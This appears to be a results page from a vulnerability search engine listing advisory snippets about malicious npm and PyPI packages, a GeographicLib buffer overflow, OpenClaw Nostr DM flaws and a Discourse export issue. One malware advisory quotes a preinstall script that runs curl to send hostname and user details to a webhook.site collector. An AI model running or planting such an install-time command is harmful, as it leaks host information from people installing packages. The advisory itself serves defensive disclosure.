CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

215 matches found

OSV•added 2026/06/15 8:8 p.m.•5 views

MAL-2026-5826 Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

5.3AI score

Exploits0References1

OSV•added 2026/06/15 9:40 a.m.•4 views

MAL-2026-5775 Malicious code in ckanext-dms (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5bce6d55a65fbab98cd93d6109b563f49e9557b542a8b9c2fd68e25755b7089e Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

5.7AI score

Exploits0References1

GithubExploit•added 2026/05/04 1:28 a.m.•67 views

Exploit for CVE-2025-60751

CVE-2025-60751: GeographicLib Stack-based Buffer Overflow 📌...

7.5CVSS5.8AI score0.02182EPSS

Exploits3

vulnersOsv•added 2026/04/29 12:33 p.m.•14 views

ai.ancf.lmos:lmos-operator (>=0.5.0 <=0.6.0), ai.telosforge:kimaira-starter-dms (>=1.2.4 <=1.2.6) +5089 more potentially affected by CVE-2026-22741 via org.springframework:spring-webmvc (>=6.2.0 <=6.2.17)

org.springframework:spring-webmvc MAVEN version =6.2.0, =0.5.0, =1.2.4, =1.2.4, =1.17.0, =0.3.0, =0.0.1, =0.1.0, =0.1.0, =0.1.0, =8.6.0, =8.6.0, =8.6.0, =8.6.0, =8.6.0, =8.8.1 and more Source cves: CVE-2026-22741 Source advisory: OSV:GHSA-WG35-8JPF-2XV3...

3.1CVSS5.4AI score0.00236EPSS

Exploits0

OSV•added 2026/04/07 6:14 p.m.•2 views

GHSA-H43V-27WG-5MF9 OpenClaw: Forged Nostr DMs could create pairing state before signature verification

Summary Before OpenClaw 2026.3.31, the Nostr DM ingress path could issue pairing challenges before validating the event signature. A forged DM could create a pending pairing entry and trigger a pairing-reply attempt before signature rejection. Impact An unauthenticated remote sender could consume...

6.9CVSS5.8AI score0.00253EPSS

Exploits0References5

Github Security Blog•added 2026/03/26 7:8 p.m.•5 views

OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement

Summary Nostr inbound DM handling could perform crypto and dispatch work before sender and pairing policy enforcement, enabling unauthorized pre-auth computation. Affected Packages / Versions - Package: openclaw npm - Affected: = 2026.3.22 - Latest released tag checked: v2026.3.23-2...

8.2CVSS5.8AI score0.00454EPSS

Exploits0References6Affected Software1

ATTACKERKB•added 2026/02/26 9:16 p.m.•3 views

CVE-2026-27153

Discourse is an open source discussion platform. Prior to versions 2025.12.2, 2026.1.1, and 2026.2.0, moderators could export user Chat DMs via the CSV export endpoint by exploiting an overly permissive allowlist in canexportentity?. The method allowed moderators to export any entity not explicit...

5.3CVSS5.8AI score0.00158EPSS

Exploits0References2Affected Software1

CVE•added 2026/02/26 9:16 p.m.•20 views

CVE-2026-27153

Discourse (open source discussion platform) is affected prior to versions 2025.12.2, 2026.1.1, and 2026.2.0. The issue arises from an overly permissive allowlist in can_export_entity?, letting moderators export any entity not explicitly blocked via the CSV export endpoint to access user Chat DMs....

5.3CVSS5.5AI score0.00158EPSS

Exploits0References1Affected Software1

RedhatCVE•added 2026/01/09 12:25 p.m.•6 views

CVE-2018-12273

The /edit URI in the DMS component in Ximdex 4.0 has XSS via the Ciudad or Nombre parameter...

6.1CVSS5.9AI score0.00865EPSS

Exploits1References1

RedhatCVE•added 2026/01/09 10:53 a.m.•33 views

CVE-2022-33139

A vulnerability has been identified in Cerberus DMS All versions, Desigo CC All versions, Desigo CC Compact All versions, SIMATIC WinCC OA V3.16 All versions in default configuration, SIMATIC WinCC OA V3.17 All versions in non-default configuration, SIMATIC WinCC OA V3.18 All versions in...

9.8CVSS7AI score0.01166EPSS

Exploits0References1

OSV•added 2025/10/21 4:15 p.m.•2 views

DEBIAN-CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

7.5CVSS5.2AI score0.02182EPSS

Exploits3References1

OSV•added 2025/10/21 4:15 p.m.•2 views

UBUNTU-CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

7.5CVSS5.8AI score0.02182EPSS

Exploits3References5

Snyk•added 2025/10/21 3:41 p.m.•5 views

Buffer Overflow

Overview Affected versions of this package are vulnerable to Buffer Overflow in the DMS::InternalDecode function. An attacker can hijack the program's control flow by overwriting a return address to point to a libc function ret2libc and execute arbitrary code or cause a crash by providing special...

8.8CVSS6.3AI score0.02182EPSS

Exploits3References2

Vulnrichment•added 2025/10/21 12:0 a.m.•2 views

CVE-2025-60751

GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDecode...

6.6AI score0.02182EPSS

Exploits3References2

CNNVD•added 2025/10/21 12:0 a.m.•3 views

GeographicLib 安全漏洞

GeographicLib is a C language library from the GeographicLib open source. A security vulnerability exists in GeographicLib version 2.5, which originates from a buffer overflow in GeoConvert DMS::InternalDecode...

7.5CVSS7AI score0.02182EPSS

Exploits3References4